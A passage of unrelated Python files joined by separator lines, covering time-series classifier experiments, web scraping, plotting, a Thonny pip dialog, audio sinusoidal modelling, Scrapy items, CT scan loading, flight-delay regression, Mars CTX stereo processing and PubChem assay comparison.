"Adiac",
"ArrowHead",
"Beef",
"BeetleFly",
"BirdChicken",
"BME",
"Car",
"CBF",
"ChlorineConcentration",
"CinCECGTorso",
"Coffee",
"Computers",
"CricketX",
"CricketY",
"CricketZ",
"DiatomSizeReduction",
"DistalPhalanxOutlineCorrect",
"DistalPhalanxOutlineAgeGroup",
"DistalPhalanxTW",
"Earthquakes",
"ECG200",
"ECG5000",
"ECGFiveDays",
"EOGHorizontalSignal",
"EOGVerticalSignal",
"EthanolLevel",
"FaceAll",
"FaceFour",
"FacesUCR",
"FiftyWords",
"Fish",
"FreezerRegularTrain",
"FreezerSmallTrain",
"Ham",
"Haptics",
"Herring",
"InlineSkate",
"InsectEPGRegularTrain",
"InsectEPGSmallTrain",
"InsectWingbeatSound",
"ItalyPowerDemand",
"LargeKitchenAppliances",
"Lightning2",
"Lightning7",
"Mallat",
"Meat",
"MedicalImages",
"MiddlePhalanxOutlineCorrect",
"MiddlePhalanxOutlineAgeGroup",
"MiddlePhalanxTW",
"MixedShapesRegularTrain",
"MixedShapesSmallTrain",
"MoteStrain",
"OliveOil",
"OSULeaf",
"PhalangesOutlinesCorrect",
"Phoneme",
"PigAirwayPressure",
"PigArtPressure",
"PigCVP",
"Plane",
"PowerCons",
"ProximalPhalanxOutlineCorrect",
"ProximalPhalanxOutlineAgeGroup",
"ProximalPhalanxTW",
"RefrigerationDevices",
"Rock",
"ScreenType",
"SemgHandGenderCh2",
"SemgHandMovementCh2",
"SemgHandSubjectCh2",
"ShapeletSim",
"SmallKitchenAppliances",
"SmoothSubspace",
"SonyAIBORobotSurface1",
"SonyAIBORobotSurface2",
"Strawberry",
"SwedishLeaf",
"Symbols",
"SyntheticControl",
"ToeSegmentation1",
"ToeSegmentation2",
"Trace",
"TwoLeadECG",
"TwoPatterns",
"UMD",
"UWaveGestureLibraryX",
"UWaveGestureLibraryY",
"UWaveGestureLibraryZ",
"Wafer",
"Wine",
"WordSynonyms",
"Worms",
"WormsTwoClass",
"Yoga",
]
if __name__ == "__main__":
"""
Example simple usage, with arguments input via script or hard coded for testing
"""
if sys.argv.__len__() > 1: # cluster run, this is fragile
print(sys.argv)
data_dir = sys.argv[1]
results_dir = sys.argv[2]
classifier = sys.argv[3]
dataset = sys.argv[4]
resample = int(sys.argv[5]) - 1
tf = str(sys.argv[6]) == "True"
run_experiment(
problem_path=data_dir,
results_path=results_dir,
cls_name=classifier,
dataset=dataset,
resampleID=resample,
train_file=tf,
)
else: # Local run
print(" Local Run")
data_dir = "Z:/ArchiveData/Univariate_ts/"
results_dir = "Z:/Results Working Area/DistanceBased/sktime/"
dataset = "ArrowHead"
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
classifier = "1NN-MSM"
resample = 0
# for i in range(0, len(univariate_datasets)):
# dataset = univariate_datasets[i]
# # print(i)
# # print(" problem = "+dataset)
tf = False
for i in range(0, len(benchmark_datasets)):
dataset = benchmark_datasets[i]
run_experiment(
overwrite=True,
problem_path=data_dir,
results_path=results_dir,
cls_name=classifier,
dataset=dataset,
resampleID=resample,
train_file=tf,
)
|
__all__ = ["Log", "Progbar", "RandomSeeds", "ModelParamStore", "DefaultDict", "Visualize"]
|
# coding: utf-8
import requests
from bs4 import BeautifulSoup
url = "http://www.pythonscraping.com/pages/page3.html"
res = requests.get(url)
bs = BeautifulSoup(res.text,'html.parser')
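# iterate over the direct children of the giftList table (including whitespace text nodes) and print each one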
for child in bs.find("table", {"id":"giftList"}).children:
print(child)
|
inp = list(map(int, input().split()))
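# keep a copy of the original input order before sorting in place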
before = inp.copy()
inp.sort()
for i in inp:
print(i)
print()
for j in before:
print(j)
|
# encoding: utf-8
"""Custom element classes related to end-notes"""
from __future__ import absolute_import, division, print_function, unicode_literals
from docx.oxml.xmlchemy import BaseOxmlElement
class CT_Endnotes(BaseOxmlElement):
"""`w:endnotes` element"""
|
import sys
import matplotlib.pyplot as plt
import numpy as np
def readData(dataFile):
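    # each line is expected to hold four space-separated values; judging from the plotting
    # code below these are num machines, num components, transaction size and transactions per second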
data=[]
with open(dataFile) as f:
for line in f:
items = line.split(' ')
assert len(items) == 4
tup = (int(items[0]), int(items[1]), int(items[2]), float(items[3]))
data.append(tup)
return data
def draw(nml, results):
for key in results.keys():
revKey = tuple(reversed(key))
sr = results[key]
f, ax = plt.subplots()
label = 'TS_%02d_NC_%06d' % revKey
ax.plot(nml, sr, marker='o')
ax.set_ylim(ymin=0)
ax.set_xticks(nml)
ax.set_xlabel('Num Machines')
ax.set_ylabel('Transactions Per Sec')
ax.set_title('Performance, transactionSize: %d, numComps: %d' % revKey)
f.savefig('perf_%s.png' % label)
def drawOld(nml, results):
f, axarr = plt.subplots(6)
for key in sorted(results.keys()):
pos = sorted(results.keys()).index(key)
assert pos >= 0 and pos < len(results)
pos = len(results) - 1 - pos
sr = results[key]
name = 'nc_%d_cpt_%d' % key
ax = axarr[pos]
ax.plot(nml, sr, label=name)
ax.legend(loc='best')
plt.xlabel('Machines')
plt.ylabel('Trans/sec')
plt.title('Performance')
plt.savefig('Performance.png')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: dataFile')
sys.exit(1)
data = readData(sys.argv[1])
for tup in data:
print('%d %d %d %6.2f' % tup)
nml = sorted(list(set([tup[0] for tup in data])))
ncl = sorted(list(set([tup[1] for tup in data])))
cptl = sorted(list(set([tup[2] for tup in data])))
plotData = {}
for cpt in cptl:
for nc in ncl:
subRes = {}
key = (nc, cpt)
plotData[key] = []
for nm in nml:
res = [tup[3] for tup in data if tup[0] == nm and tup[1] == nc and tup[2] == cpt]
assert len(res) == 1
plotData[key].append(res[0])
for kt in plotData.keys():
print('%s -> %s' % (str(kt), str(plotData[kt])))
draw(nml, plotData)
|
import os
from abc import ABC
from thonny import get_runner
from thonny.common import normpath_with_actual_case
from thonny.plugins.cpython_frontend.cp_front import LocalCPythonProxy
from thonny.plugins.pip_gui import BackendPipDialog
class CPythonPipDialog(BackendPipDialog, ABC):
def _is_read_only(self):
# readonly if not in a virtual environment
# and user site packages is disabled
return (
self._use_user_install()
and not get_runner().get_backend_proxy().get_user_site_packages()
)
def _get_target_directory(self):
if self._use_user_install():
usp = self._backend_proxy.get_user_site_packages()
if isinstance(self._backend_proxy, LocalCPythonProxy):
os.makedirs(usp, exist_ok=True)
return normpath_with_actual_case(usp)
else:
return usp
else:
sp = self._backend_proxy.get_site_packages()
if sp is None:
return None
return normpath_with_actual_case(sp)
def _use_user_install(self):
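        # install into the user site-packages unless the backend targets a virtual environment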
return not self._targets_virtual_environment()
def _targets_virtual_environment(self):
return get_runner().using_venv()
class LocalCPythonPipDialog(CPythonPipDialog):
def _installer_runs_locally(self):
return True
def _get_interpreter_description(self):
return get_runner().get_backend_proxy().get_target_executable()
def _normalize_target_path(self, path: str) -> str:
return normpath_with_actual_case(path)
def _append_location_to_info_path(self, path):
self.info_text.direct_insert("end", normpath_with_actual_case(path), ("url",))
|
from typing import List
import collections
import heapq
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
if k == len(nums):
return nums
count = collections.Counter(nums)
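        # heapq.nlargest picks the k keys with the highest counts in O(n log k)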
return heapq.nlargest(k, count.keys(), key = count.get)
if __name__== '__main__':
solution = Solution()
nums = [1,1,1,2,2,3]
k = 2
ans = solution.topKFrequent(nums, k)
print(ans)
|
# function to call the main analysis/synthesis functions in software/models/sineModel.py
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import get_window
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../models/'))
import utilFunctions as UF
import sineModel as SM
def main(inputFile='../../sounds/bendir.wav', window='hamming', M=2001, N=2048, t=-80, minSineDur=0.02,
maxnSines=150, freqDevOffset=10, freqDevSlope=0.001):
"""
Perform analysis/synthesis using the sinusoidal model
inputFile: input sound file (monophonic with sampling rate of 44100)
window: analysis window type (rectangular, hanning, hamming, blackman, blackmanharris)
    M: analysis window size; N: fft size (power of two, greater than or equal to M)
t: magnitude threshold of spectral peaks; minSineDur: minimum duration of sinusoidal tracks
maxnSines: maximum number of parallel sinusoids
freqDevOffset: frequency deviation allowed in the sinusoids from frame to frame at frequency 0
freqDevSlope: slope of the frequency deviation, higher frequencies have bigger deviation
"""
# size of fft used in synthesis
Ns = 512
# hop size (has to be 1/4 of Ns)
H = 128
# read input sound
fs, x = UF.wavread(inputFile)
# compute analysis window
w = get_window(window, M)
# analyze the sound with the sinusoidal model
tfreq, tmag, tphase = SM.sineModelAnal(x, fs, w, N, H, t, maxnSines, minSineDur, freqDevOffset, freqDevSlope)
# synthesize the output sound from the sinusoidal representation
y = SM.sineModelSynth(tfreq, tmag, tphase, Ns, H, fs)
# output sound file name
outputFile = 'output_sounds/' + os.path.basename(inputFile)[:-4] + '_sineModel.wav'
# write the synthesized sound obtained from the sinusoidal synthesis
UF.wavwrite(y, fs, outputFile)
# create figure to show plots
plt.figure(figsize=(9, 6))
# frequency range to plot
maxplotfreq = 5000.0
# plot the input sound
plt.subplot(3,1,1)
plt.plot(np.arange(x.size)/float(fs), x)
plt.axis([0, x.size/float(fs), min(x), max(x)])
plt.ylabel('amplitude')
plt.xlabel('time (sec)')
plt.title('input sound: x')
# plot the sinusoidal frequencies
plt.subplot(3,1,2)
if (tfreq.shape[1] > 0):
numFrames = tfreq.shape[0]
frmTime = H*np.arange(numFrames)/float(fs)
tfreq[tfreq<=0] = np.nan
plt.plot(frmTime, tfreq)
plt.axis([0, x.size/float(fs), 0, maxplotfreq])
plt.title('frequencies of sinusoidal tracks')
# plot the output sound
plt.subplot(3,1,3)
plt.plot(np.arange(y.size)/float(fs), y)
plt.axis([0, y.size/float(fs), min(y), max(y)])
plt.ylabel('amplitude')
plt.xlabel('time (sec)')
plt.title('output sound: y')
plt.tight_layout()
plt.ion()
plt.show()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scrapy import Item, Field
class Subject(Item):
douban_id = Field()
type = Field()
class Meta(Item):
douban_id = Field()
type = Field()
cover = Field()
name = Field()
slug = Field()
year = Field()
directors = Field()
actors = Field()
genres = Field()
official_site = Field()
regions = Field()
languages = Field()
release_date = Field()
mins = Field()
alias = Field()
imdb_id = Field()
douban_score = Field()
douban_votes = Field()
tags = Field()
storyline = Field()
class Comment(Item):
douban_id = Field()
douban_comment_id = Field()
douban_user_nickname = Field()
douban_user_avatar = Field()
douban_user_url = Field()
content = Field()
votes = Field()
|
# Building (Edificio) class
class Edificio:
    # Object attributes
def __init__(self, type, count, huella, dptos, ancho, largo, adpto, prior, areacons, niveles):
self.type = type
self.count = count
self.huella = huella
self.dptos = dptos
self.ancho = ancho
self.largo = largo
self.adpto = adpto
self.prior = prior
self.areacons = areacons
self.niveles = niveles
|
import os
import glob
import numpy as np
import torch
import pydicom
from pydicom.pixel_data_handlers.util import apply_modality_lut
import nibabel as nib
def read_ct_scan(ct_dir, hu_range=None):
dicom_paths = glob.glob(f"{ct_dir}/*.dcm")
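    # sort the DICOM slices by SliceLocation so the volume is ordered along the z-axis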
dicom_files = sorted(
[pydicom.read_file(path) for path in dicom_paths],
key=lambda ds: ds.SliceLocation,
)
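    # apply the modality LUT (rescale slope/intercept) to map raw pixel values to Hounsfield-like units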
ct_arr = [apply_modality_lut(ds.pixel_array, ds) for ds in dicom_files]
ct_arr = np.array(ct_arr, dtype=np.float32)
return ct_arr
def read_masks(fpath):
seg_file = nib.load(fpath)
masks = seg_file.dataobj[:].astype(np.float32)
# move z dim to 1st dim
masks = masks.transpose(2, 0, 1)
# match mask to CT image orientation
masks = np.rot90(masks, k=1, axes=(1, 2))
# remove left, right lung information
masks[masks > 0] = 1.0
masks = np.ascontiguousarray(masks)
return masks
def read_mask(fpath, slice_idx):
seg_file = nib.load(fpath)
mask = seg_file.dataobj[..., slice_idx].astype(np.int64)
# match mask to CT image orientation
mask = np.rot90(mask, k=1)
# remove left, right lung information
mask[mask > 0] = 1
mask = np.ascontiguousarray(mask)
return mask
def get_common_ids(*dirs):
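    # IDs (directory entries) present in every one of the given directories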
res = set.intersection(*[set(os.listdir(d)) for d in dirs])
return sorted(list(res))
|
"""Assigment#1.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1zDOQ7DiZycLsPiQp9KkLTJIKcqIqOAjl
"""
# Commented out IPython magic to ensure Python compatibility.
import datetime, warnings, scipy
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from sklearn import metrics, linear_model
from sklearn.metrics import r2_score
from sklearn.preprocessing import PolynomialFeatures
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from scipy.optimize import curve_fit
# %matplotlib inline
warnings.filterwarnings("ignore")
df = pd.read_csv('./flight_delay.csv', low_memory=False)
print('Dataframe dimensions:', df.shape)
def df_info(df):
tab_info=pd.DataFrame(df.dtypes).T.rename(index={0:'column type'})
tab_info=tab_info.append(pd.DataFrame(df.isnull().sum()).T.rename(index={0:'null values (nb)'}))
tab_info=tab_info.append(pd.DataFrame(df.isnull().sum()/df.shape[0]*100)
.T.rename(index={0:'null values (%)'}))
return tab_info
# Calculate zeros delay in whole dataset
zero_delay_whole_dataset = (df['Delay']==0).sum()
print(zero_delay_whole_dataset)
print(f"% of zero delays in dataset: {zero_delay_whole_dataset/df.shape[0]*100})")
"""**Add additional feature - Duration of the flight in minutes & Delayed Fact**"""
flight_duration = pd.to_datetime(df['Scheduled arrival time']) - pd.to_datetime(df['Scheduled depature time'])
flight_duration = pd.to_timedelta(flight_duration).astype('timedelta64[m]').astype(int)
df.info()
# Preprocessing data
df['Duration'] = flight_duration
df['Year'] = pd.DatetimeIndex(df['Scheduled depature time']).year
df['Month'] = pd.DatetimeIndex(df['Scheduled depature time']).month
df['Day'] = pd.DatetimeIndex(df['Scheduled depature time']).day
df['Scheduled depature time'] = pd.to_datetime(df['Scheduled depature time'])
df['Scheduled arrival time'] = pd.to_datetime(df['Scheduled arrival time'])
df['Depature Airport'] = df['Depature Airport'].astype("category")
df['Destination Airport'] = df['Destination Airport'].astype("category")
df['Departure time'] = df['Scheduled depature time'].dt.time
df['IS_delay'] = (df['Delay'] > 0).astype('int')
"""**Visualization**"""
"""**Missing Values**"""
# Now we will check the missing values of the dataset to detect unusable features and to see whether the remaining missing values are meaningful.
def missing_values_checker(dataframe):
sums = dataframe.isna().sum(axis=0)
nan_count_limit = 0
    # create tuples (nan_sum, column_name), filter it and sort it
non_zero_pairs = sorted([pair for pair in zip(sums, dataframe.columns) if pair[0] > nan_count_limit])
non_zero_pairs.append((len(dataframe), 'Result'))
# split tuples into separate lists
non_zero_sums, non_zero_labels = zip(*non_zero_pairs)
nans_range = np.asarray(range(len(non_zero_sums)))
# print info
for i, (non_zero_sum, non_zero_label) in enumerate(non_zero_pairs):
print('{}, {}: {}'.format(i, non_zero_label, non_zero_sum))
# plot info
plt.figure()
ax = plt.gca()
ax.set_xticks(nans_range)
plt.bar(nans_range, non_zero_sums)
plt.show()
feature_dist = df['Depature Airport'].value_counts()
print(feature_dist)
feature_dist.count()
def check_feature_dist(feature_name,data_frame):
carrier_count = data_frame[f"{feature_name}"].value_counts()
sns.set(style="darkgrid")
sns.barplot(carrier_count.index, carrier_count.values, alpha=0.9)
plt.title(f'Frequency Distribution of {feature_name}')
plt.ylabel('Number of Occurrences', fontsize=12)
plt.xlabel(f'{feature_name}', fontsize=12)
plt.show()
"""**Label encoding**"""
list_categorical_features = df.select_dtypes(include=['object']).columns.to_list()
list_categorical_features.append('Depature Airport')
list_categorical_features.append('Destination Airport')
list_categorical_features
labels_airport = df['Depature Airport']
lb_make = LabelEncoder()
integer_encoded = lb_make.fit_transform(df['Depature Airport'])
zipped = zip(integer_encoded, df['Depature Airport'])
label_airports = list(set(list(zipped)))
label_airports.sort(key = lambda x:x[0])
onehot_encoder = OneHotEncoder(sparse=False)
integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)
onehot_encoded = onehot_encoder.fit_transform(integer_encoded)
correlations = df.corr()
plt.figure(figsize=(12,12))
sns.heatmap(correlations, center=0, annot=True, vmin=-1, vmax=1, cmap="BrBG")
plt.show()
# visualize the relationship between the features and the response using scatterplots
pp = sns.pairplot(df, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7)
pp.fig.suptitle("Correlation between Duration and Delay")
# sns.pairplot(df, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7, kind='reg')
df['DATE'] = pd.to_datetime(df[['Year','Month', 'Day']])
dep_airport = 'SVO'
df2 = df[(df['Depature Airport'] == dep_airport) & (df['Delay'] > 0)]
df2.sort_values('Scheduled depature time', inplace = True)
df2.head()
plt.figure(figsize=(12,12))
plt.scatter(df2['Scheduled depature time'], df2['Delay'], label='initial data points')
plt.title("Corelation between depart time and delay for SVO")
plt.xlabel('Departure time', fontsize = 14)
plt.ylabel('Delay', fontsize = 14)
train = df.loc[(df['Year'] <= 2017) & (df['Year'] >=2015)]
test = df.loc[df['Year'] == 2018]
# get only categorical features
cat_df_flights = train.select_dtypes(include=['object']).copy()
cat_df_flights.head()
print(cat_df_flights.columns.to_list())
print(cat_df_flights.isnull().values.sum())
print(cat_df_flights.isnull().sum())
"""**Remove outliers on delay**"""
# calculate mean
mean = train['Delay'].mean()
print(mean)
# calculate standard deviation
sd = train['Delay'].std()
# determine a threshold
threshold = 2
# detect outlier
train['z_score'] = (train['Delay'] - mean)/sd
train.loc[abs(train['z_score']) > threshold, 'z_score'] = None
train = train.dropna()
pp = sns.pairplot(train, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7)
pp.fig.suptitle("Correlation between Duration and Delay")
"""**Models execution**"""
# Apply diffrent models on dataset
from sklearn.linear_model import LinearRegression
lm = linear_model.LinearRegression()
model = lm.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = lm.predict(train['Duration'].to_numpy().reshape(-1, 1))
print("MSE_train =", metrics.mean_squared_error(predictions, train['Delay']))
lm = linear_model.LinearRegression()
model = lm.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = lm.predict(test['Duration'].to_numpy().reshape(-1, 1))
print("MSE_test =", metrics.mean_squared_error(predictions, test['Delay']))
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
y_pred = pd.DataFrame(data=predictions).astype('int64')
df_info(y_pred)
print(f"Accuracy score: {accuracy_score(test['Duration'], y_pred=y_pred)}")
poly = PolynomialFeatures(degree = 4)
regr = linear_model.LinearRegression()
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
regr.fit(X_, train['Delay'])
result = regr.predict(X_)
print("MSE_train =", metrics.mean_squared_error(result, train['Delay']))
tips = pd.DataFrame()
tips["prediction"] = pd.Series([float(s) for s in result])
tips["original_data"] = pd.Series([float(s) for s in train['Delay']])
sns.jointplot(x="original_data", y="prediction", data=tips, size = 6, ratio = 7,
joint_kws={'line_kws':{'color':'limegreen'}}, kind='reg')
plt.xlabel('Mean delays (min)', fontsize = 15)
plt.ylabel('Predictions (min)', fontsize = 15)
plt.plot(list(range(-10,25)), list(range(-10,25)), linestyle = ':', color = 'r')
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = regr.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
print("Mean squared error = ", score)
zero_delay_test_dataset = (test['Delay']==0).sum()
print(zero_delay_test_dataset)
print(f"% of zero delays in dataset: {zero_delay_test_dataset/test.shape[0]*100})")
from sklearn.linear_model import Ridge
ridgereg = Ridge(alpha=0.3,normalize=True)
poly = PolynomialFeatures(degree = 4)
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
ridgereg.fit(X_, train['Delay'])
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = ridgereg.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
print("Mean squared error withy regurilization = ", score)
print(f"R2 score{r2_score(test['Delay'], result)}")
res_score = 10000
for rank in range(1, 4):
for alpha in range(0, 20, 2):
ridgereg = Ridge(alpha = alpha/10, normalize=True)
poly = PolynomialFeatures(degree = rank)
regr = linear_model.LinearRegression()
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
ridgereg.fit(X_, train['Delay'])
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = ridgereg.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
if score < res_score:
res_score = score
parameters = [alpha/10, rank]
print("n = {} alpha = {} , MSE = {:<0.5}".format(rank, alpha, score))
from sklearn.linear_model import LogisticRegression
logistic_reg = LogisticRegression(penalty='l1', solver='saga')
logistic_reg.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = logistic_reg.predict(train['Duration'].to_numpy().reshape(-1, 1))
score = metrics.mean_squared_error(train['Delay'], predictions)
print("Mean squared error withy regurilization = ", score)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# __BEGIN_LICENSE__
# Copyright (c) 2009-2013, United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The NGT platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# __END_LICENSE__
import sys, os, glob, optparse, re, shutil, subprocess, string, time
def man(option, opt, value, parser):
print >>sys.stderr, parser.usage
print >>sys.stderr, '''\
Generates a stereo DEM from a pair of CTX images.
'''
sys.exit()
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
#--------------------------------------------------------------------------------
def replaceExtensionAndFolder(inputPath, outputFolder, newExtension):
newExt = os.path.splitext(inputPath)[0] + newExtension
return os.path.join(outputFolder, os.path.basename(newExt))
def prepareImage(inputPath, workDir, keep):
"""Prepare a single CTX image for processing"""
# Set up paths
cubPath = replaceExtensionAndFolder(inputPath, workDir, '.cub')
calPath = replaceExtensionAndFolder(inputPath, workDir, '.cal.cub')
# Convert to ISIS format
cmd = 'mroctx2isis from=' + inputPath + ' to=' + cubPath
os.system(cmd)
# Init Spice data
cmd = 'spiceinit from=' + cubPath
os.system(cmd)
# Apply image correction
cmd = 'ctxcal from='+cubPath+' to='+calPath
os.system(cmd)
    # You can also optionally run ctxevenodd on the cal.cub files, if needed
if not keep:
os.remove(cubPath)
return calPath
def main():
print '#################################################################################'
print "Running processCtxPair.py"
try:
try:
usage = "usage: processCtxPair.py <left image> <right image> <output prefix> [--workDir <folder>][--keep][--manual]\n "
parser = optparse.OptionParser(usage=usage)
parser.set_defaults(keep=False)
parser.add_option("--workDir", dest="workDir", help="Folder to place intermediate files in")
parser.add_option("--manual", action="callback", callback=man,
help="Read the manual.")
parser.add_option("--keep", action="store_true", dest="keep",
help="Do not delete the temporary files.")
(options, args) = parser.parse_args()
if len(args) < 3:
parser.error('Missing required input!')
options.leftPath = args[0]
options.rightPath = args[1]
options.outputPrefix = args[2]
if not options.workDir:
options.workDir = os.path.dirname(options.outputPrefix)
except optparse.OptionError, msg:
raise Usage(msg)
startTime = time.time()
# Do individual input image preparations
leftCalPath = prepareImage(options.leftPath, options.workDir, options.keep)
rightCalPath = prepareImage(options.rightPath, options.workDir, options.keep)
# Do joint prepration
cmd = 'cam2map4stereo.py ' + leftCalPath + ' ' + rightCalPath
os.system(cmd)
        leftMapPath = replaceExtensionAndFolder(options.leftPath, options.workDir, '.map.cub')
        rightMapPath = replaceExtensionAndFolder(options.rightPath, options.workDir, '.map.cub')
# Final stereo call
cmd = ('parallel_stereo.py ' + leftMapPath + ' ' + rightMapPath + ' ' + options.outputPrefix
+ ' --alignment affineepipolar --subpixel-mode 3 --corr-timeout 400'
+ ' --filter-mode 1 --subpixel-max-levels 0')
os.system(cmd)
# Clean up temporary files
if not options.keep:
os.remove(leftCalPath)
os.remove(rightCalPath)
os.remove(leftMapPath)
os.remove(rightMapPath)
endTime = time.time()
print "Finished in " + str(endTime - startTime) + " seconds."
print '#################################################################################'
return 0
except Usage, err:
print err
print >>sys.stderr, err.msg
return 2
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python
#############################################################################
### pubchem_assaysim.py - assay similarity based on activity profiles
### from PubChem CSV assay file[s]
#############################################################################
import os,sys,re,getopt,gzip,zipfile,tempfile
#try:
# import gdbm
#except:
# import dbm as gdbm
from ... import pubchem
PROG=os.path.basename(sys.argv[0])
DATADIR="/home/data/pubchem/bioassay/csv/data"
SCRATCHDIR='/tmp/'+PROG+'_SCRATCHDIR'
#############################################################################
if __name__=='__main__':
usage='''
%(PROG)s - assay similarity based on activity profiles (A vs. B)
required:
--aidA=<AID> ... assay ID A
--aidB=<AID> ... assay ID B
options:
--v ... verbose
--vv ... very verbose
--h ... this help
'''%{'PROG':PROG,'DATADIR':DATADIR}
def ErrorExit(msg):
print >>sys.stderr,msg
sys.exit(1)
indir=DATADIR;
infile=None; verbose=0;
aidA=None; aidB=None;
opts,pargs = getopt.getopt(sys.argv[1:],'',['h','v','vv','indir=',
'aidA=','aidB=','infile=' ])
if not opts: ErrorExit(usage)
for (opt,val) in opts:
if opt=='--h': ErrorExit(usage)
elif opt=='--indir': indir=val
elif opt=='--aidA': aidA=val
elif opt=='--aidB': aidB=val
elif opt=='--vv': verbose=2
elif opt=='--v': verbose=1
else: ErrorExit('Illegal option: %s'%val)
if not (aidA and aidB):
ErrorExit('--aidA and --aidB required\n'+usage)
try:
aidA=int(aidA)
aidB=int(aidB)
except:
ErrorExit('aidA and aidB must be integers.\n'+usage)
###
fpath_csv_gzA=None; fpath_csv_gzB=None;
for fname_zip in os.listdir(indir):
if not re.search('\.zip',fname_zip): continue
fpath_zip=indir+'/'+fname_zip
try:
zf=zipfile.ZipFile(fpath_zip,'r')
except:
print >>sys.stderr, 'ERROR: cannot read fpath_zip: "%s"'%fpath_zip
continue
flist_csv_gz=zf.namelist()
zf.close()
for fpath_csv_gz in flist_csv_gz:
if not re.search('\.csv\.gz',fpath_csv_gz): continue
try:
if re.search(r'/',fpath_csv_gz):
txt=re.sub(r'^.*/(\d*)\.csv\.gz',r'\1',fpath_csv_gz)
else:
txt=re.sub(r'\.csv\.gz','',fpath_csv_gz)
aid=int(txt)
except:
print >>sys.stderr, 'cannot parse AID: "%s"'%fpath_csv_gz
print >>sys.stderr, 'DEBUG txt: "%s"'%txt
continue
if aid==aidA:
fpath_zipA=fpath_zip
fpath_csv_gzA=fpath_csv_gz
if verbose>1:
print >>sys.stderr, '\tA: %s: %s (%s)'%(aidA,fpath_zipA,fpath_csv_gzA)
if aid==aidB:
fpath_zipB=fpath_zip
fpath_csv_gzB=fpath_csv_gz
if verbose>1:
print >>sys.stderr, '\tB: %s: %s (%s)'%(aidB,fpath_zipB,fpath_csv_gzB)
if fpath_csv_gzA and fpath_csv_gzB: break
if fpath_csv_gzA and fpath_csv_gzB: break
if not fpath_csv_gzA:
ErrorExit('ERROR: could not find file for AID %s'%(aidA))
if not fpath_csv_gzB:
ErrorExit('ERROR: could not find file for AID %s'%(aidB))
if not os.access(SCRATCHDIR,os.R_OK):
try:
os.mkdir(SCRATCHDIR)
except:
print >>sys.stderr, 'ERROR: failed to create SCRATCHDIR %s'%SCRATCHDIR
sys.exit(1)
zfA=zipfile.ZipFile(fpath_zipA,'r')
cwd=os.getcwd()
os.chdir(SCRATCHDIR)
zfA.extract(fpath_csv_gzA)
os.chdir(cwd)
zfA.close()
f_csvA=gzip.open(SCRATCHDIR+'/'+fpath_csv_gzA)
csvA=f_csvA.read()
f_csvA.close()
if not csvA:
ErrorExit('ERROR: file empty: AID %d: %s'%(aidA,fpath_csv_gzA))
zfB=zipfile.ZipFile(fpath_zipB,'r')
cwd=os.getcwd()
os.chdir(SCRATCHDIR)
zfB.extract(fpath_csv_gzB)
os.chdir(cwd)
zfB.close()
f_csvB=gzip.open(SCRATCHDIR+'/'+fpath_csv_gzB)
csvB=f_csvB.read()
f_csvB.close()
if not csvB:
ErrorExit('ERROR: file empty: AID %d: %s'%(aidB,fpath_csv_gzB))
sids_active=[]; sids_inactive=[]; sids_inconclusive=[]; sids_unspecified=[];
sids_discrepant=[]; sids_tested=[];
sidset={};
n_datapoints_total=0
use_cids=False;
sidsA=pubchem.ftp.Utils.ExtractOutcomes(csvA,sidset,use_cids)
sidsB=pubchem.ftp.Utils.ExtractOutcomes(csvB,sidset,use_cids)
print >>sys.stderr, '\t aidA, SIDs total: %3d'%(len(sidsA.keys()))
print >>sys.stderr, '\t aidB, SIDs total: %3d'%(len(sidsB.keys()))
sids_all=(set(sidsA.keys()) | set(sidsB.keys()))
sids_common=(set(sidsA.keys()) & set(sidsB.keys()))
print >>sys.stderr, '\t aidA | aidB, SIDs total: %3d'%(len(sids_all))
print >>sys.stderr, '\t aidA & aidB, SIDs common: %3d'%(len(sids_common))
n_activeA=0; n_inactiveA=0; n_inconclusiveA=0; n_unspecifiedA=0; n_discrepantA=0;
n_activeB=0; n_inactiveB=0; n_inconclusiveB=0; n_unspecifiedB=0; n_discrepantB=0;
n_active_common=0
for sid in sids_all:
outcomeA=None;
outcomeB=None;
if sidsA.has_key(sid):
outcomeA=sidsA[sid]['outcome']
if outcomeA==2: n_activeA+=1
elif outcomeA==1: n_inactiveA+=1
elif outcomeA==3: n_inconclusiveA+=1
elif outcomeA==4: n_unspecifiedA+=1
elif outcomeA==5: n_discrepantA+=1
